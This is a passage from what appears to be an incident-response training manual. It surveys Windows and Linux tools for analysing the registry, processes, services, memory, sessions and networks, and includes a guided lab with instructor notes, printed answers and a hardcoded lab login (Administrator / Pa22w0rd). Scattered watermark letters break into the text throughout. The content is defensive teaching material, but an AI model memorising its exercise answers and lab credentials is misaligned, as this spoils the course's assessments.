For example, regdump is a tool that dumps the contents of the Registry in a text file with simple
formatting. This can help you search specific strings in the file with findstr, or, if you're analyzing
from a Linux® machine, you can use grep.
is
Autoruns is a utility that enables you to view every application and process that starts automatically
when Windows is booted. It also provides a link to the Registry keys that configure autorun
D
functionality for the relevant app or process. If malicious software or some other unauthorized
process boots with Windows, you can use Autoruns to more easily identify the compromised
Registry entries.
File System Analysis Tools for Windows

or
e
There are many ways the Windows file system can be used as both a vector and a target for an File System Analysis
attack. Monitoring how the file system changes over time can greatly assist your analysis efforts. Tools for Windows
at
Since most malware resides somewhere within a host's file structure, being able to identify the
malware and assess how it behaves is crucial to removing all traces of the infection.
lic
The standard dir command, which lists all files and folders in a directory, actually has some
advanced functionality for file system analysis. The -Ax switch filters all file/folder types that match
the given parameter ( x ). For example, dir -AH displays only hidden files and folders. Malicious
up
files marked as hidden are much easier to find this way than looking through every entry, especially
if the folder contains hundreds or thousands of files. Since PowerShell is now default in Windows,
you should consider using the Get-ChildItem cmdlet and its various arguments instead.
D
For tools that specifically focus on file system analysis, you should also consider the many drive
usage tools available. These tools will typically scan a file system and retrieve comprehensive
statistics about how that system is operating, including:
ot
• Visual representation of storage space. For example, a tree map can represent a hierarchy of
folders and increase the visual size of folders depending on how much data they hold.
• A directory listing of storage space, with folders and files sortable by size, extension, number of
N
files, and more.

• The real-time usage of information being written to a drive.
o
• A list of individual processes and applications and their live read/write speeds of a drive.
Applications and processes that consume too much drive capacity or too much live activity may be
D
malicious. They might be constantly running in the background, consuming too much of the
computer's storage or CPU, and slowing the computer to a crawl. Drive usage tools include:
• Task Manager
• Resource Monitor
• SpaceSniffer
• WinDirStat

• TreeSize
• DiskSavvy
e
ut
ib
tr
is
D
or
Figure 9-2: Resource Monitor displaying activity on a disk.
e
PE Explorer
at
PE Explorer is proprietary software that offers a variety of different features, including the ability to
browse the structure of 32-bit Windows executable files. The main advantage of this is you can
observe what a program is accessing, like what dynamic-link libraries (DLLs) it calls and how it
lic
interfaces with other applications on the system, as well as how it uses application programming
interfaces (APIs).
Being able to open executables like EXEs can help you determine whether or not the executable is
up
exhibiting malicious behavior. It also lets you see if any legitimate apps are calling malicious libraries
that could be affecting both the app and the system it runs on.
D
Process Analysis Tools for Windows: Process Explorer

Process Explorer A process is an instance of a running application, and many default processes in Windows run
ot
quietly in the background. An attacker who is able to hijack these processes can eavesdrop or make
unauthorized changes to a computer depending on the process's access rights. Attackers can also
N
craft malicious processes to run without the user's knowledge, which can make the task of
identifying related problems much more difficult. Although Task Manager gives the user an
overview of the running processes on the system, as well as the ability to alter those processes, there
o
are other tools more specialized in this area.

For instance, Microsoft offers the Process Explorer program via a free download as part of its
D
Sysinternals suite of tools. Process Explorer goes beyond Task Manager and provides many more
features to help you analyze running application code. One feature includes the ability to see all the
system resources a particular process is currently reserving. If you are unable to edit or otherwise
manage a particular file, you can use Process Explorer to identify the potentially malicious process
that is using it. Likewise, Process Explorer can assist you in examining an unknown process by
displaying the DLLs it is using or the Registry entries it is tied to.

e
ut
ib
tr
is
D
or
e
Figure 9-3: Process Explorer showing the Registry keys associated with a specific process.
at
Process Analysis Tools for Windows: Process Monitor

lic
Another tool for process analysis is Process Monitor (Procmon), also offered by Microsoft as part Process Monitor
of Sysinternals. Whereas Process Explorer is better used as an advanced Task Manager, enabling you
to monitor processor and memory consumption in real time, Process Monitor is more suited toward
up
analyzing how the process interacts with the system by filtering and searching a log of process
activity data. In particular, with Process Monitor you can analyze every operation a process has
undertaken (including Registry key usage), the status of that operation, and any additional input/
output detail of that operation.
D
You can also analyze each operation's thread stack to find its root cause. For example, if an
application is attempting to access a file that doesn't exist, you can review the stack to see if any of
ot
the modules there seem out of place with regard to what the application should or should not do. A
malicious DLL, for instance, could be interfering with the process's normal execution.
N
o
D

e
ut
ib
tr
is
D
or
e
Figure 9-4: Filtering logged process data using Process Monitor.
at
Command-Line Tools
There are also a few Windows-based command-line tools that offer similar functionality to the
lic
previous GUI tools. An older tool is tlist, which displays process information like its memory
usage, the state of running threads, a process tree, and individual operations for each process. The
tlist tool was replaced by tasklist, which offers most of the same functionality.
up
Service Analysis Tools for Windows

D
Service Analysis Tools Although processes can run without any overt sign to the user, Windows services are almost always
for Windows designed to run in the background without directly interfering with the current user's desktop
session. This essentially makes services a type of non-interactive process. Malware that installs itself
ot
as a service can effectively hide itself from manual detection, and may even be able to escape the
notice of traditional anti-malware scanners. There are some tools that can help you identify
suspicious service activity, however.
N
You can view running services in Task Manager, but Windows also comes with a Microsoft
Management Console (MMC) snap-in simply called Services.msc. This snap-in provides a list of all
o
active services, as well as details of each service, including a description of what it does. It also
enables you to start or stop a service. You can also view and enable/disable services from the
D
Services tab of the MSConfig utility, though this provides you with less detail about each service.
The shell command net start is another way to display all running services on the computer—this
lists their names without any further detail. The equivalent command in PowerShell is:
Get-Service | Where-Object {$_.Status -eq "Running"}
Although these tools can help you identify an unknown or suspicious service running on the
computer, they aren't particularly complex. A tool with a little more robust feature set for analysis is
the Windows Task Scheduler. Task Scheduler not only enables you to create new tasks to run at

predefined times, but it also records the status of certain services. The properties dialog box of each
task includes a History tab that provides details of every time the service was started or stopped or
when it completed a particular action. This is essentially a version of Event Viewer for that one task
—you can see the time each action was recorded, its event ID, what kind of action it took, and
more. If a system service is acting strangely due to malicious tampering, you may be able to more
easily analyze its behavior using Task Scheduler. Task Scheduler may also be able to capture the
history of non-system services, like malware that installs itself as its own service.
e
ut
ib
tr
is
D
or
e
at
lic
up
Figure 9-5: The history of a task in Task Scheduler.
Malware Analysis Tools for Windows

D
Although many of the previously mentioned tools can help you detect malware, specialized software Malware Analysis Tools
is required to actually analyze how malicious software functions and operates on a target system. for Windows
ot
These tools can range from being relatively simple to operate, like malware scanners, to very
complex, like disassemblers. If you're interested in taking a deep dive into the inner workings of
N
malware, be prepared to learn low-level programming techniques.

There are several types of malware analysis tools, including:
• Anti-malware solutions. These solutions scan one or more systems in real time for the
o
presence of malware and can take action in response to detecting malware, like removing or
D
quarantining it. Anti-malware solutions can include everything from end-user software (often
called "antivirus" software, even though they can detect other types of malware) to more robust
enterprise solutions (e.g., endpoint detection and response [EDR]). Anti-malware solutions are
often the most basic line of defense against malware, though they are not the most thorough or
effective. Examples include:
• Windows Security (also known as Microsoft Defender)
• Malwarebytes Anti-Malware

• Avast
• AVG
• Crowd-sourced signature detection services. Some websites have been set up to receive
signature information from people and organizations, and then compile that information into a
public database. You can upload a file to the site, which analyzes the file for known malicious
signatures. The site might also show which anti-malware solutions mark the file as malicious
versus those that do not. The benefit of crowd sourcing signature detection is that security
professionals can collaborate to identify new malware as it arises rather than just relying on a
single source of information. Examples include:
e
• VirusTotal (https://www.virustotal.com)
ut
• Hybrid Analysis (https://www.hybrid-analysis.com)
• Malware sandboxes. Sandboxing is a technique that isolates untrusted data in a closed virtual
environment to conduct tests and analyze the data for threats and vulnerabilities. Malware
ib
sandboxes are common environments from which security practitioners examine malware and
how it operates without threatening actual hosts or the wider network. Examples include:
tr
• Cuckoo Sandbox
• VirtualBox
is
• VMware
• Hyper-V
D
• Static malware analyzers. Various tools can provide a deeper look into malware than just a
signature. One common static analysis technique is to look for strings within a malware's
executable file. In this case, a string is any sequence of encoded characters that appears within
or
the executable file. So, a string analysis can reveal everything from variables the program is using
to API calls, and more. These strings may help you identify the nature or function of the
malware. Examples include:
e
• Strings
• findstr
at
• Reverse engineering tools. Reverse engineering is the process of analyzing a system's or

application's structure to reveal more about how it functions. In the case of malware, being able
lic
to examine its base structure can provide you with information as to how the malware
propagates, what its primary directives are, and where it originated from. One of the most
common methods of reverse engineering is disassembly. A disassembler performs the reverse
engineering process of translating low-level machine language code into higher level assembly
up
language code. Examples include:

• Interactive Disassembler (IDA) Pro
• OllyDbg
D
• WinDbg
ot
Volatile Memory Analysis Tools for Windows

Volatile Memory Random-access memory (RAM) is volatile, meaning that data written to it will not stay there very
N
Analysis Tools for long. Data temporarily written to RAM may be gone a fraction of a second after it's written, which
Windows makes analysis of RAM difficult and complex. So, you'll need to use tools to image the memory for
Volatile data collection is static analysis. However, even the process of running a memory imaging tool can overwrite crucial
o
discussed in more detail RAM sectors, so you should seek out tools that leave a very small memory footprint as part of their
in the forensics lesson. execution. Some volatile memory imaging tools include Belkasoft Live RAM Capturer, MAGNET
D
RAM Capture, FTK Imager, and PMDump.

Once you've captured a RAM image, you can use an analysis tool to actually identify known
signatures. For example, you suspect that an attacker took control of one of your workstations and
initiated a Skype® chat from the computer. The contents of these communications might reveal
more about the attack or its perpetrator(s). A program like Skype writes a specific string to memory
before every message sent, so you could search for this string in your memory capture to more easily
identify where the messages reside.

Proprietary tools with this functionality include Belkasoft Evidence Center X and Forensic Toolkit.
Some freeware alternatives include WinDbg and Volatility. Volatility, in particular, has many
different modules for analyzing specific elements of memory. If you only want to retrieve a list of
DLLs used by processes in memory, you can run the dlllist module; if you want to see a history
of commands run at the command prompt, you can use the cmdscan module; and so on. Volatility
also has a GUI version called Volatility Workbench.
e
ut
ib
tr
is
D
or
e
at
Figure 9-6: Using Volatility Workbench to analyze DLL history from a memory dump.
lic
Active Directory Analysis Tools

up
Attackers targeting a Windows Active Directory® (AD) system may try to elevate access, create new Active Directory Analysis
users, delete users, or use techniques like the golden ticket to exploit Kerberos. There are many tools Tools
that can supplement the standard Active Directory MMC snap-ins by providing you with greater
monitoring and summary information so you can detect such attacks. For example, Active Directory
D
Explorer can list all objects within an Active Directory domain, as well as display the attributes for
each object in a detailed list. You can use Active Directory Explorer, available from the Sysinternals
suite, to examine what date and time an account was last changed; when the account's password was
ot
last set; when the account was last logged on/off; and so on. This information can help you identify
unusual behavior or attributes that are configured with suspicious values.
N
o
D

e
ut
ib
tr
is
D
Figure 9-7: Analyzing the attributes of an account using Active Directory Explorer.
or
Additionally, ManageEngine offers a full suite of freeware Active Directory tools called ADManager
Plus. The suite enables you to run queries on your Active Directory structure so that you can find
the values you're looking for; reports the last logon times of domain users; reports user accounts
with empty passwords; includes a password policy manager; and much more. Being able to retrieve
e
crucial summary information about the accounts and other objects in your domain will help you
identify anomalies and potential Active Directory–related incidents.
at
Network Analysis Tools for Windows

lic
Network Analysis Tools Aside from performing analysis on specific hosts, you can actively analyze your network
for Windows infrastructure using various tools available for Windows, many of which come with the OS by
up
Several of these tools default.

have been discussed
before, so you may wish Tool How It Applies to Network Analysis
to just briefly remind
D
students how they apply Wireshark As you've seen, Wireshark is a powerful packet analyzer. It can easily
to network analysis reveal to you anomalous behavior that may suggest an incident is taking
rather than go into detail. place. Excessive packets sent from many sources to one destination could
ot
indicate a distributed denial of service (DDoS) attack; multiple IP

addresses pointing to the same MAC address could indicate an Address
Resolution Protocol (ARP) poisoning attack; you can inspect unencrypted
N
packets for known malicious signatures or unauthorized information; and

so on. Wireshark's user-friendly GUI and extensive feature set make it an
ideal network analysis tool.
o
Nmap® Nmap is another tool you've seen in action, but mostly from a
D
reconnaissance point of view. Nmap can also aid you in analyzing your
network by enumerating hosts. With enumeration, you can identify any
rogue or otherwise unknown hosts attached to and transmitting on your
network. You can also use Nmap to test how well your network firewalls
and other defenses are able to block Internet Control Message Protocol
(ICMP) and other types of traffic that Nmap uses to scan hosts.

Tool How It Applies to Network Analysis

Vistumbler This is a wireless networking tool that maps and visualizes the wireless
access points throughout a network. Vistumbler can make the task of
detecting rogue access points much easier. In addition to Wi-Fi,
Vistumbler can also be configured to collect data over GPS.
iPerf This tool enables you to measure your network's bandwidth and packet
loss by sending data streams between a client and server in the network.
The streams use Transmission Control Protocol (TCP) and/or User
e
Datagram Protocol (UDP), and you can configure them in a number of
ut
ways, including the size of UDP datagrams. Measuring bandwidth on the
network can help you spot trouble areas where actual throughput is
slower than acceptable levels, impacting your network's availability.
ib
ipconfig This command enables you to view IP address and Domain Name
System (DNS) information on a host. This is a quick and easy way to get
tr
the networking information of a host you have access to. This is essential
in taking inventory of known hosts to compare against any unknown
hosts discovered in network enumeration. If a legitimate host has been
is
compromised, you can also use ipconfig to see if its networking
information has been altered, like its DNS lookup pointing to a malicious
D
server rather than the organization's. This command comes with
Windows.
netstat
or
Like ipconfig, this command can be used as a diagnostic tool to check a
host's network information. In the case of netstat, it displays all
network connections that the host is currently listening to. It provides
information about the protocol used, the local host's address, the address
e
it's listening to, and the state of the connection (as defined by RFC 793).
Using this command can help you identify unknown or malicious sockets
at
a host is connected to, as well as any errors in its routing tables. This
command comes with Windows.
lic
TCPView This tool is part of the Sysinternals suite and shows information similar to
netstat, but in a GUI. It also provides additional information about
network connections, including creation time, number of sent packets,
up
and more. TCPView provides a greater deal of interactivity through

searching, sorting, and filtering operations.
nbtstat This is another diagnostic tool. It displays a host's NetBIOS over TCP/IP
D
information. Aside from local retrieval, you can also retrieve NetBIOS
information from a remote host with the -a or -A flags. NetBIOS
information can help you map a network by viewing a host's computer
ot
name and MAC address. If a particular NetBIOS entry appears faulty, it

may indicate unauthorized changes to that host's network configurations.
This command comes with Windows.
N
net This command enables you to manage various network resources. For
analysis purposes, net view and net use are the most relevant
o
subcommands. The former subcommand provides you with a list of all

hosts on a network that your interface can see, enabling you to spot rogue
D
hosts. The latter subcommand displays information about the host's

network connections. The net share and net file subcommands can
also reveal network shares and files that the host is sharing. This
command comes with Windows.


tracert This command displays the route that packets take across a network to
reach a given destination. It also provides information on delays that may
occur as the packet traverses the route. If a tracert starts to time out at
a certain node on the path, then it could indicate the last successful node
is transmitting in error. It can also indicate the local host's routing tables
have been corrupted in some way; if multiple hosts have their routes
terminated at a specific IP address, then that IP address may be acting as
e
a sinkhole to capture information. Even if requests don't time out, an
unknown node along a path could be acting as a man in the middle,
ut
eavesdropping on traffic as it traverses the network. This command
comes with Windows.
ib
arp This command enables you to view and manipulate the system's ARP
cache. To view the cache on all interfaces, you need to use the -a flag,
but you can also get more granular and specify which interface you want
tr
with the -N flag. Analyzing the system's ARP cache is a more direct way
than Wireshark of detecting multiple IP addresses resolving to the same
is
MAC address (in other words, ARP poisoning). This command comes
with Windows.
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 9-1
Analyzing Incidents with Windows-Based Tools
Data Files
e
C:\CNX0013Data\Performing Active Asset and Network Analysis\putty.exe
ut
C:\CNX0013Data\Performing Active Asset and Network Analysis\ProcessExplorer\procexp.exe
Activity: Analyzing
Before You Begin Incidents with Windows-
ib
Based Tools
You'll be using your Windows 10 client for this activity. You'll be using the Windows-based Secure
Shell (SSH) client PuTTY to open a shell onto your server. You'll also run Process Explorer, a tool
tr
that does not come with Windows but is available for download from Microsoft's website.
is
Scenario
In your domain, you monitor the security of Develetech's Windows 10 workstations. These
D
computers are under constant threat of compromise through malware and other malicious activity.
Therefore, you need to use the tools at your disposal to more easily detect an incident when it
occurs.
or
First, you'll retrieve networking information using ipconfig to get a more accurate picture of how
the workstations communicate. You'll examine how sessions like SSH connections can be
monitored using the netstat command.
e
Then, you'll take a more detailed look at the running processes on your workstations using Process
Explorer. Process Explorer can reveal much about a process's behavior, including how it interfaces
at
with the Windows Registry.

Finally, you'll inspect the Registry using Registry Editor to get a better idea of how certain programs
lic
are using the Windows architecture. Using these various Windows-based tools will ensure your user
workstations are continuously monitored for incidents.
up
1. Examine the ipconfig options.

a) On your Windows 10 desktop, right-click the Start button and select Windows PowerShell (Admin).
D
b) At the prompt, enter ipconfig /?

c) Examine the various options for ipconfig.
ot
2. How would you renew a Dynamic Host Configuration Protocol (DHCP) lease
on your Ethernet adapter?
N
A: ipconfig /renew Ethernet
3. List all of your active network adapters.

o
a) Enter ipconfig /all

D

b) Note all of the active network adapters.
e
ut
ib
tr
Ensure students leave
is
this prompt open for the 4. What is the default gateway for your Ethernet adapter?
next step.
A: 10.39.5.1
The answer to this
D
question will need to
change if your 5. What is the DNS address for your Ethernet adapter?
classroom network is A: 10.39.5.#, where # is the student's Windows Server IP address.
different than what's
detailed in the course
setup. 6.
Server .
®
or
Initiate an SSH session from your Windows 10 client to your Windows
e
a) From the course data files, open putty.exe.
at
b) In the Host Name (or IP address) field, type your Windows Server's IP address.
c) Verify the SSH radio button is selected and select Open.
d) In the PuTTY Security Alert dialog box, select Accept to trust the connection.
lic
e) At the login prompt, enter Administrator

f) At the password prompt, enter Pa22w0rd
g) Verify that you're given a shell onto the server.
up
D
ot
N
7. In PowerShell, run netstat to view all open connections.

o
a) Switch back to Windows PowerShell.

b) Enter netstat /?
D
c) Note the various options available for this command.

d) Enter netstat -ab
It will take a few moments for the scan to run.
8. What do the -a and -b flags do in netstat?

A: The -a flag shows all connections and listening ports, and the -b flag shows the executables
associated with each connection.

9. Examine how netstat lists the open SSH connection.

a) Look for the entry concerning putty.exe.
e
ut
ib
tr
10.What does the status show for that connection?
is
A: ESTABLISHED
D
11.Examine how netstat lists a recently closed SSH session.
a) Switch back to your PuTTY connection and enter exit to close the session.
b) Return to the netstat list.
or
c) Enter netstat -n and note the state of the connection with a foreign port of 22 (SSH).
e
at
lic
up
The state of the connection is now TIME_WAIT. This indicates the connection has been closed by
the local host, but it is still sending and receiving any packets that may have been delayed. The
D
connection will terminate completely in a few moments.

If students don't run the
12.Use Process Explorer to view details about running processes on the system. netstat -n command
ot
quickly enough after

a) From the course data files, right-click procexp64.exe and select Run as administrator.
exiting PuTTY, they may
b) In the Process Explorer License Agreement dialog box, select Agree. not see the TIME_WAIT
N
c) Verify that you can see the various processes running on your Windows 10 system. entry.
o
D

d) In the Process Explorer window, from the menu, select View→Show Lower Pane.
e
ut
ib
tr
is
D
or
e
at
e) Select View→Lower Pane View→DLLs.

f) In the upper pane, select the Company Name column to sort by that field.
lic
g) Identify any unusual process that is running.

Most of the processes on the server are from Microsoft or some other known third-party entity, but
one process, obscura.exe, claims to be from Develetech.
up
h) Select the obscura.exe entry.

If students prefer, have i) Verify that there are a large number of active DLLs used by this process.
them examine a different
running process for the
D
following steps. They

can also open a new
program and examine its
ot
processes.
N
o
D
Students only need to

13.Upload the obscura.exe process signature to VirusTotal.
agree to the licensing
terms once, so if they a) Right-click obscura.exe and select Check VirusTotal.
close and reopen b) When a browser window opens, return to Process Explorer and select Yes to agree to the licensing
Process Explorer, they terms, then select OK.
won't get prompted
again.

c) In Process Explorer, in the VirusTotal column, select the number link to open the file's page on
VirusTotal.
d) Verify that some of the anti-malware solutions tracked by VirusTotal consider this malware.
e) Select the DETAILS tab, then scroll down to the File Version Information section.
f) Scroll down, and under the File Version Information section, verify that the Obscura executable is
not signed.
e
ut
ib
tr
is
D
or
e
at
The file is not actually malicious, but it does exhibit unusual behavior. It's a good idea to remove it,
lic
or at least learn more about what it does.
14.Identify a Registry key used by the Obscura process.

up
a) Close any open browser windows.

b) In Process Explorer, with obscura.exe still selected, select View→Lower Pane View→Handles.
c) Verify that there are various types of handles: Desktop, Event, File, Key, and more.
D
ot
N
o
D

d) Look for the key value with the Registry path HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run.
e
ut
ib
tr
is
Note: If necessary, sort by Type and focus on Key entries.
D
e) Double-click the key and then copy it from the Name text box.
f) Select OK to close the dialog box.
15.View or
the key's details in the Windows Registry.
a) Select the Windows 10 Start button and type regedit
e
b) Select Registry Editor from the results.
c) In the Registry Editor window, in the address bar, replace the existing text and paste the key path
at
you copied.
lic
up
D
ot
d) Press Enter to navigate to that key.

N
Ensure that students

don't modify other
aspects of the Registry
o
unless they know what

they're doing.
D
The list of Registry

values in the screenshot
may not exactly align
with what students see,
depending on the
hardware drivers that
are installed on their
systems.

e) Verify that this key includes several values, including a path to the obscura.exe file. This Registry
key is used to automatically start processes when the system starts, so that means the unknown
process will continue to run even after restarting the server.
e
ut
ib
f) Right-click the obscura entry in the Registry and select Delete.
tr
g) Select Yes to confirm.
h) Close Registry Editor.
is
i) Wait about 10 seconds and look for the Obscura.txt file to appear on the desktop.
j) Open the file and verify that it says the Obscura process was revealed.
D
k) Return to Process Explorer, right-click obscura.exe, and select Kill Process. Select OK to confirm.
l) Verify that the obscura.exe entry disappears from Process Explorer.
m) Delete Obscura.txt from the desktop.
16.How could these tools help you discover and deal with malware?or
A: Answers will vary. The netstat command can enable you to find any open or recently closed
network connections that are either malicious or being used in an insecure way. Process Explorer
e
enables you to find suspicious processes and see how they interface with system DLLs and the
Windows Registry. Registry Editor enables you to further identify a suspicious program's
at
configuration details, including any changes to the less visible components of the operating
system. With any tool, you need a good working knowledge of Windows' normal operation to
lic
make educated decisions about what is and is not malware.
17.Close Process Explorer and Windows PowerShell.

up
D
ot
N
o
D

TOPIC B
Analyze Incidents with Linux-Based Tools
Just like with Windows, some analysis tools target Linux distributions specifically. Some tools are
even cross-platform. In this topic, you'll use both in a Linux environment.
e
File System Analysis Tools for Linux
ut
File System Analysis Linux comes with several tools to aid in analyzing a file system. One such tool is lsof, which
Tools for Linux retrieves a list of all files currently open on the OS. This can be everything from a regular text file
ib
open in a text editor to a network socket, and much more. Basically, any resource that is currently
active will be displayed when using the lsof command. Although the output of lsof can be
customized, it typically provides for each file:
tr
• The process ID for the process that has the file open.
is
• The owner of the process.
• The size of the file.
D
• The file's local or network address.
• The file's TCP state, if applicable.
• The file's access mode.
or
The power of lsof for file analysis is that you can quickly get a list of all resources a process is
currently using, which can come in handy in identifying malicious processes that are using too many
resources or resources they should not have access to. You can also go the other way and identify
e
malicious resources that are using specific processes. If you have a file name or process ID that you
want to look for specifically, you can also tell lsof to retrieve just those results. For example, if you
at
want to retrieve all files open by the root user that are being used by process ID 533, you'd enter
lsof -u root -a -p 533. In this case, the -a option creates an AND operator.
lic
up
D
ot
N
Figure 9-8: Using lsof to display open files for a particular process and user.
Aside from live analysis of a Linux file system, you may need to make a secure copy in order to
o
preserve the integrity of the file system. The dd command in Linux enables you to make full copies
D
of individual files or entire drives. If you copy individual files, you can retain their file format like
any standard copy operation; if you copy entire drives or partitions, you can clone them by creating
a drive image, like an ISO. The syntax of a standard copy using dd is as follows:
dd if=/dev/sr1/ of=drive-image.iso
A more recent fork of dd is dcfldd, which provides additional features like multiple output files and
exact match verification.
Lesson 9: Performing Active Asset and Network Analysis | Topic B

Drive Usage Tools

Linux distributions come with a couple of basic command-line tools for checking drive usage: df
and du. With df, you can retrieve how much drive space is being used by all mounted file systems,
as well as how much space is available for each. The du command enables you to retrieve how much
drive space each directory is using based on the directory you specify. So, if you want to know how
large your /var/log/ folder is, you'd enter du /var/log.
Third-party Linux packages also offer a visual overview of the file system, much like what's available
in Windows. For example, QDirStat is like WinDirStat in that it can display file/folder sizes relative
e
to others using charts and graphs. Some Linux distributions that use the Gnome desktop come with
Disk Usage Analyzer, formerly named Baobab, which also depicts file and folder sizes in both a list
ut
and graphical format. For KDE environments, a similar tool called Filelight is available.
Process Analysis Tools for Linux
ib
Like on Windows, Linux processes are an instance of an application that is currently running. A Process Analysis Tools
tr
basic command for listing current processes is ps. To get a full list of all running processes for all for Linux
users, use the -A option. The command comes with options to specify output formatting, but the
is
default output behavior retrieves the process ID, the TTY (which terminal executed the process),
the execution time of the process, and the name of the process itself. You can filter the results by
these fields—for example, to find the process ID of cron, you'd enter ps -C cron. You can also
D
sort results by piping in the sort command—for example, to find the processes that are resulting in
the most CPU overhead, you can enter ps -A | sort -k 3 to sort by column 3 (execution time).
or
Using the ps command is a quick and simple way to query the OS to identify any process-related
anomalies. An unknown or dubious process may indicate the host is compromised, especially if it's
consuming a great deal of processing time.
A static list provided by ps can be useful, but what if you want to monitor processes in real time,
e
rather than executing the command every few seconds? The top command does just that. It creates
at
a scrollable table of each and every running process, and it is constantly refreshed so you see the
most up-to-date statistics. The default information provided by the table includes the process ID,
user, percentage of CPU being used, percentage of memory being used, execution time, and more
lic
about each process.

Like ps, you can filter and sort the output of top to only display the information relevant to you.
Since the top command has some amount of interactivity, you simply need to type a capital P while
up
the command is running to sort the table by CPU usage. Monitoring the real-time CPU usage of
running processes is an effective way to compare a computer's execution overhead with another
baseline environment. If the CPU usage of certain processes, or all processes as a whole, far exceed
D
the comparable baseline, then this may be a sign of exploitation.

Note: Some Linux distributions also come with htop, a more interactive version of top.
ot
N
o
D

e
ut
Figure 9-9: The top command sorting the real-time process table by CPU usage.
ib
Malware Analysis Tools for Linux
tr
Malware Analysis Tools Malware doesn't target Linux to the same degree as Windows, so there aren't many worthwhile end-
is
for Linux user anti-malware solutions out there. However, you can still use Linux tools to analyze malicious
software.
D
For example, you can use strings to retrieve the executable's strings in a static analysis, or you can
use a tool like grep to search and filter for text data embedded in an executable. There are also
many disassemblers available for Linux, including the GNU Debugger (GDB) and a Unix-like
or
version of IDA. The U.S. National Security Agency (NSA) also developed and released a cross-
platform reverse engineering tool called Ghidra as open source software in 2019.
As far as sandboxing malware goes, you can use one of several Linux-based virtualization platforms,
including QEMU and Kernel-Based Virtual Machine (KVM). There are also versions of VirtualBox
e
and VMware available for Unix-like systems.
at
lic
up
D
ot
N
o
D
Figure 9-10: Using the strings command to search for Registry-related strings in an executable
file.

Volatile Memory Analysis Tools for Linux

Some of the volatile memory analysis tools you've seen for Windows, like Belkasoft Evidence Volatile Memory
Center and Volatility, are also compatible with the Linux platform. The dcfldd command can also Analysis Tools for Linux
work with certain Linux kernel modules to capture a system's memory into an image.
However, most Linux distributions come packaged with a command called free, which outputs a
summary of the amount of used and freely available memory on the computer. It retrieves this
information from /proc/meminfo and divides information between physical memory and swap
memory. By default, the information output of free is as follows:
e
• The total memory available.
ut
• The total memory being used.
• The total memory going unused.
• The amount of memory used by temporary files.
ib
• The amount of memory used by kernel buffers and the page cache.
• The amount of estimated memory available for new processes, taking into account the page
tr
cache.
is
Note: Like many Linux tools, you can use the -h switch with free to make the output more
human readable.
D
or
Figure 9-11: Displaying a system's memory usage with the free command.
e
at
While free does not enable you to analyze a system's memory bit for bit, its high-level overview of
memory usage can help you troubleshoot slow system performance, a potential symptom of
malware compromise. Consider using free in tandem with top to confirm both excessive CPU and
lic
memory usage when you suspect an incident may be causing the system to freeze, crash, or
otherwise operate non-responsively.
up
Session Analysis Tools for Linux

There are times when you'll need to verify what users or entities are currently logged in to a Linux Session Analysis Tools
for Linux
D
machine. As part of persistence and other post-attack processes, attackers may leave rogue accounts
running on a system. Depending on these accounts' access rights, the attacker could use them to
further compromise the system or its other users, or it could be using the system as a launching
ot
point from which to continue moving laterally throughout the network. Whatever the case may be,
monitoring for suspicious logged-in entities can alert you to malicious behavior.
Linux distributions come with a few built-in session management tools for quick and easy access to
N
this information. In fact, there are three commands that perform approximately the same function,
with a few key differences: who, w, and rwho.
o
The who command, by default, shows what user accounts are logged in, what TTYs they have active
for each running process, and what date/time they logged in. The w command displays the same
D
basic information, but also returns the remote host (if applicable), how long the account has been
idle, the names of processes the account is actively running, the execution time of each process, and
more. You can filter the results by account name (e.g., w root). Lastly, rwho runs on a client/server
architecture—a host runs the rwhod server, and the client runs the rwho -a command to retrieve
active account information for all hosts on the local network. The output of rwho is similar to who.

Figure 9-12: The w command revealing an unknown account (hjkla) logged in from a remote
machine (10.39.5.10).
e
The lastlog Command
ut
Even if you don't catch a rogue account when it's logged in, you can still retrieve login history from
the /var/log/lastlog file using the lastlog command. This command will list the account name,
ib
TTY, remote host (if applicable), and the last time the user logged in. You can also filter these
results by more than n days old (-b) and less than n days old (-t). Attackers may not allow their
rogue accounts to stick around precisely because they fear active monitoring; so, even after they've
tr
quickly entered and left a system, you can still detect the traces of their intrusion with lastlog.
is
Network Analysis Tools for Linux
D
Network Analysis Tools The following table lists some of the network analysis tools available for Linux. Depending on the
for Linux distribution you use, some of these tools may not be installed by default.
Tool
Wireshark or
How It Applies to Network Analysis
Wireshark on Linux provides essentially the same functionality as it does

on Windows. Some security-based Linux distributions, like Kali Linux™,
e
come pre-packaged with Wireshark.
at
tcpdump This is a command-line packet analyzer, similar in purpose to Wireshark.

It offers much the same information on each packet, including source,
destination, protocol, and contents. However, it is more limited in
lic
functionality compared to Wireshark, especially in its sorting and filtering

options. Still, it's useful as a quick and simple way to capture and analyze
network packets.
up
Nmap Like Wireshark, Nmap is not significantly different between platforms.

Distributions like Kali Linux come with Nmap installed, as well as
Zenmap, its GUI counterpart.
D
Kismet Kismet is an open source multi-purpose wireless networking tool for

Unix-based systems. It can identify devices, sniff packets, function as a
wireless IDS, and perform wardriving. In addition to Wi-Fi, Kismet also
ot
works with other wireless protocols used in personal computing like

Bluetooth.
N
Aircrack-ng Aircrack-ng is an open source wireless networking suite primarily known

for its Wi-Fi cracking utilities, but also has utilities that can detect
network devices and sniff packets.
o
iPerf This is also a cross-platform tool that offers the same basic functionality.
D
Linux distributions that are geared toward network testing, like

StressLinux, may come with iPerf installed.


ip Using ip a, this command performs a similar function to Windows'
ipconfig—displaying information about a device's network interfaces,
including the IP address, netmask, and MAC address. The format of how
information is presented is different, however, and you may need to
adjust when going from one platform to another. The ip command also
has many other options for retrieving network information, including
route for retrieving routing table entries, rule for retrieving routing
e
policy rules, neigh for retrieving the ARP cache, and many more.
ut
Note: The ip command is intended to replace the deprecated
ifconfig command, which is still available on many Linux
distributions.
ib
netstat Again, this tool is essentially the same as with Windows, but it tends to be
more verbose in its default settings. The format of some of the options
tr
also differs, so ensure that you review its manual page beforehand. A
newer command meant to replace netstat on Linux is ss, which can
is
query the kernel directly and therefore provide a quicker response. It can
also display more statistics about TCP sockets and connection states than
D
netstat.
traceroute This is essentially the same as Windows' tracert. The main difference is
that, on Windows, tracert uses ICMP echos, whereas traceroute on
or
Linux uses UDP datagrams over ports 33434 and 33435. This may end
up failing if the firewall blocks higher-number UDP ports. Most
implementations of traceroute do have an option to use ICMP echo
requests instead.
e
arp Like its Windows counterpart, this tool displays the system's ARP cache.
at
The default behavior in Linux is to display the cache for all available
interfaces.
lic
up
D
ot
N
o
D

ACTIVITY 9-2
Analyzing Incidents with Linux-Based Tools
Before You Begin
e
